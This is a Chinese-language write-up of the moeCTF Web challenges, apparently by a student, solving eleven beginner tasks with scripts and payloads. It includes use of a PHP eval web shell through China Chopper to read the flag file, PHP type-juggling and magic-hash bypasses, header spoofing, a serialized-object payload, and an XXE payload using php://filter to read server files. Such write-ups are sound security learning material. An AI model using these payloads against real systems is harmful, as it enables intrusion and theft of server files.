【moeCTF 题解 -0x06】Web 竟然 AK 了这部分,但也只是因为题目简单……
考虑到在 XDSEC 里选了 web 方向,也要好好学习 web 知识呀
【moeCTF 题解】总目录如下:
Web 11/11
GET
50points
http://web.moectf.online/GET/
Hint
什么是 GET?
如何 GET?
打开靶机地址
1 2 3 4 5 6 7 8 9 10 <?php error_reporting(0 ); highlight_file(__FILE__ ); include 'flag.php' ; $a = $_GET ['a' ]; if ($a ==flag) die ($flag );
URL 后面加上?a=flag来 GET 传值
http://web.moectf.online/GET/?a=flag
打开得到 flagmoectf{Y0u_kn0w_G4T_n0w}
POST
50points
http://web.moectf.online/POST/
Hints
链接:
什么是 POST?
如何 POST?
1 2 3 4 5 6 7 8 9 10 <?php error_reporting(0 ); highlight_file(__FILE__ ); include 'flag.php' ;$a = $_POST ['a' ];if ($a ==flag)die ($flag );
POST 一个a=flag上去:
就得到 flag:moectf{Y0u_kn4w_p0st_n0w}
这里我使用的是火狐开发者版与插件HackBar V2 来进行 post 的,轻量且适合小白
小饼干
50points
http://web.moectf.online/bis/
小饼干,就是 cookie 啦
浏览器 - 开发者工具栏 - 网络-Cookie 中可以查看 cookie:
1 Cookie "moectf{y0u_c4n't_e4t_thi3_c00k1e}"
得到 flag:moectf{y0u_c4n't_e4t_thi3_c00k1e}
(响应头里面也有)
Introduction
50points
地址:
你能找到 flag 嘛?
查看 HTML 源码,分别找到如下注释
就是 flag 了。
一句话
100points
http://39.98.86.109:10000/
拿到 flag 就别乱搞了哦
打开网页:
1 2 3 4 5 <?php error_reporting(0 ); highlight_file("index.php" ); eval ($_POST ['a' ]);?>
发现里面已经内嵌了一句话木马eval($_POST['a']);
上久闻大名的中国菜刀 (China chopper)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 [/var/www/html/]$ ls -l ../../../ total 84 drwxr-xr-x 3 root root 4096 Feb 15 2016 app drwxr-xr-x 1 root root 4096 Feb 15 2016 bin drwxr-xr-x 2 root root 4096 Apr 10 2014 boot drwxr-xr-x 5 root root 340 Aug 4 03:21 dev drwxr-xr-x 1 root root 4096 Aug 4 03:21 etc -rw-r--r-- 1 root root 40 Jun 17 16:22 flag drwxr-xr-x 2 root root 4096 Apr 10 2014 home drwxr-xr-x 1 root root 4096 Feb 15 2016 lib drwxr-xr-x 2 root root 4096 Jan 19 2016 lib64 drwxr-xr-x 2 root root 4096 Jan 19 2016 media drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt drwxr-xr-x 2 root root 4096 Jan 19 2016 opt dr-xr-xr-x 186 root root 0 Aug 4 03:21 proc drwx------ 1 root root 4096 Aug 4 03:23 root drwxr-xr-x 1 root root 4096 Aug 4 03:21 run drwxr-xr-x 1 root root 4096 Jan 19 2016 sbin drwxr-xr-x 2 root root 4096 Jan 19 2016 srv dr-xr-xr-x 13 root root 0 Aug 4 03:21 sys drwxr-xr-x 1 root root 4096 Feb 15 2016 usr drwxr-xr-x 1 root root 4096 Feb 15 2016 var [/var/www/html/]$ cat ../../../flag moectf{0hhhh!!!y0u_know_h0w_to_u3e_eva1}
于是得到 flag:moectf{0hhhh!!!y0u_know_h0w_to_u3e_eva1}
EzMath
150points
http://39.98.86.109:10001/
简简单单数学题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import requestsr = requests.Session() s = r.post("http://39.98.86.109:10001/" ) s.encoding = 'utf-8' print (s.text)print ("====================" )for i in range (1 ): tet = s.text iAlg = tet.find("br>" ) alg = tet[iAlg+3 :iAlg+15 ] iEqu = alg.find("=" ) alg = alg[:iEqu] print (alg,'============' ,str (eval (alg))) s = r.post('http://39.98.86.109:10001/' , data={"a" : (eval (alg))}) s.encoding = 'utf-8' print (s.text)
得到 flag:moectf{MA7H_1s_s0_ea5y!!r1ght?}
听说直接禁用 JavaScript 也可以?
三心二意
points
http://39.97.238.171:8002/
Hint
怀着三个等号的心,做了两个等号的事。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?php $a = $_GET ['a' ]; $b = $_POST ['b' ]; $c = $_REQUEST ['c' ]; $d = $_COOKIE ['d' ]; if (!isset ($a , $b , $c , $d )) { highlight_file(__FILE__ ); } else { if (is_numeric($a ) and $a == false ) { echo 'A is OK!' ; echo '<br/>' ; if (!is_numeric($b ) and $b == 0x125e591 ) { echo 'B is OK!' ; echo '<br/>' ; if ($c != 240610708 and md5($c ) == md5(240610708 )) { echo 'C is OK!' ; echo '<br/>' ; if (strlen($d ) < 7 and $d != 0 and $d ** 2 == 0 ) { include ('/flag' ); } else { echo "D is not wanted.<br/>" ; highlight_file(__FILE__ ); } } else { echo "C is not wanted.<br/>" ; highlight_file(__FILE__ ); } } else { echo "Too young too simple.<br/>" ; highlight_file(__FILE__ ); } } else { echo "A is not wanted.<br/>" ; highlight_file(__FILE__ ); } }
1 2 3 4 5 6 7 8 9 10 import requestsheader = {} cookie = {'d' :'1e-222' } postpayload = {"b" :"19260817a" ,"c" :"QNKCDZO" } r = requests.post('http://39.97.238.171:8002/?a=0&c=QNKCDZO' , data=postpayload, cookies=cookie) print (r.text[:100 ])
moectf{PHP_1s_the_besT_lAngu@ge}
俄罗斯头套
200points
http://39.98.86.109:10002/
头
1 2 你的ip是:██████████████████████ 不是127.0.0.1的话我可不会给你flag哦
1 2 你的ip是:127.0.0.1 什么?你不是从"https://www.baidu.com"来的?那可不行...
1 2 你的ip是:127.0.0.1 什么?你用的不是POST请求?那可不行...
1 2 你的ip是:127.0.0.1 什么?你用的不是"supreme"浏览器?那可不行...
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Host: 39.98.86.109:10002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://www.baidu.com Content-Type: application/x-www-form-urlencoded Content-Length: 6 Origin: http://39.98.86.109:10002 Connection: keep-alive Cookie: PHPSESSID=98rbnl919ufqd9s19fo5qbnom0 Upgrade-Insecure-Requests: 1 Server: supreme X-Forwarded-For: 127.0.0.1 Pragma: no-cache Cache-Control: no-cache
moectf{r3que5t_he4der_1s_ea5y!!}
Moe include
200points
http://web.moectf.online/include/
1 <a href ="?file=hint.php" > do not click</a >
1 2 3 4 5 6 7 8 9 10 11 <!DOCTYPE html > <html > <head > <title > </title > </head > <body > </body > </html >
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php error_reporting(E_ALL); ini_set('open_basedir' , '/var/www/moectf/include' ); $file = $_GET ["file" ];if (stristr($file ,"php://input" ) || stristr($file ,"zip://" ) || stristr($file ,"phar://" ) || stristr($file ,"data:" )){ exit ('get out!' ); } if ($file ){ include ($file ); }else { echo '<a href="?file=hint.php">do not click</a>' ; } ?>
moectf{php_is_the_best_language}
Moe unserialize
250points
http://web.moectf.online/unserialize/
1 有一天,赤道企鹅在愉快的使用vim给学弟挖坑,突然伴随着身体的一阵抽搐,电脑死机了。企鹅悲痛欲绝,聪明的你能帮助企鹅找到他挖的坑吗?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 <?php error_reporting(0 ); class Moe public $a ; protected $b ; private $c ; function __destruct ( if ($this ->a === '1' && $this ->b === '2' && $this ->c === '3' ) { include 'flag.php' ; die ($flag ); } } } $moe = $_GET ['flag' ];unserialize($moe ); ?> 有一天,赤道企鹅在愉快的使用vim给学弟挖坑,突然伴随着身体的一阵抽搐,电脑死机了。企鹅悲痛欲绝,聪明的你能帮助企鹅找到他挖的坑吗? serialize() <?php class Moe public $a ; public $b ; public $c ; function __destruct ( if ($this ->a === '1' && $this ->b === '2' && $this ->c === '3' ) { include 'flag.php' ; die ($flag ); } } } $m = new Moe;$m ->a = '1' ;$m ->b = '2' ;$m ->c = '3' ;echo serialize($m );?> ?flag=O:3 :"Moe" :3 :{s:1 :"a" ;s:1 :"1" ;s:1 :"b" ;s:1 :"2" ;s:1 :"c" ;s:1 :"3" ;} moectf{Y0u_4re_A_Moe} 仍有疑问:为什么能访问保护对象
访问这个
moectf{Y0u_4re_A_Moe}
EzXXE
250points
http://39.97.238.171:8001/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 <?php libxml_disable_entity_loader (false ); $xmlfile = file_get_contents('php://input' ); if (strpos($xmlfile ,"flag1.txt" ) !== FALSE ){ if (strpos($xmlfile ,'file:/' ) === FALSE ){ die ("Please use file protocol.<br/><br/>" ); } } if (strpos($xmlfile ,"flag2.php" ) !== FALSE ){ if (strpos($xmlfile ,'file:/' ) !== FALSE ){ echo "Why not try php://filter?" ; echo '<br/><br/>' ; } } $dom = new DOMDocument(); $dom ->loadXML($xmlfile , LIBXML_NOENT | LIBXML_DTDLOAD); $test = simplexml_import_dom($dom ); echo $test ; highlight_file(__FILE__ ); ?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import requestsimport base64if __name__ == '__main__' : url = 'http://39.97.238.171:8001/' xml = """<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flags/flag2.php"> ]> <value>&xxe;</value>""" req = requests.request(method='POST' ,url = url, data = xml) print (req.text) print (base64.b64decode(b'PD9waHAgJGZsYWcyID0gJzRuZF9waHBfZjFsdDNyfSc7ID8+' ))
未完待续……
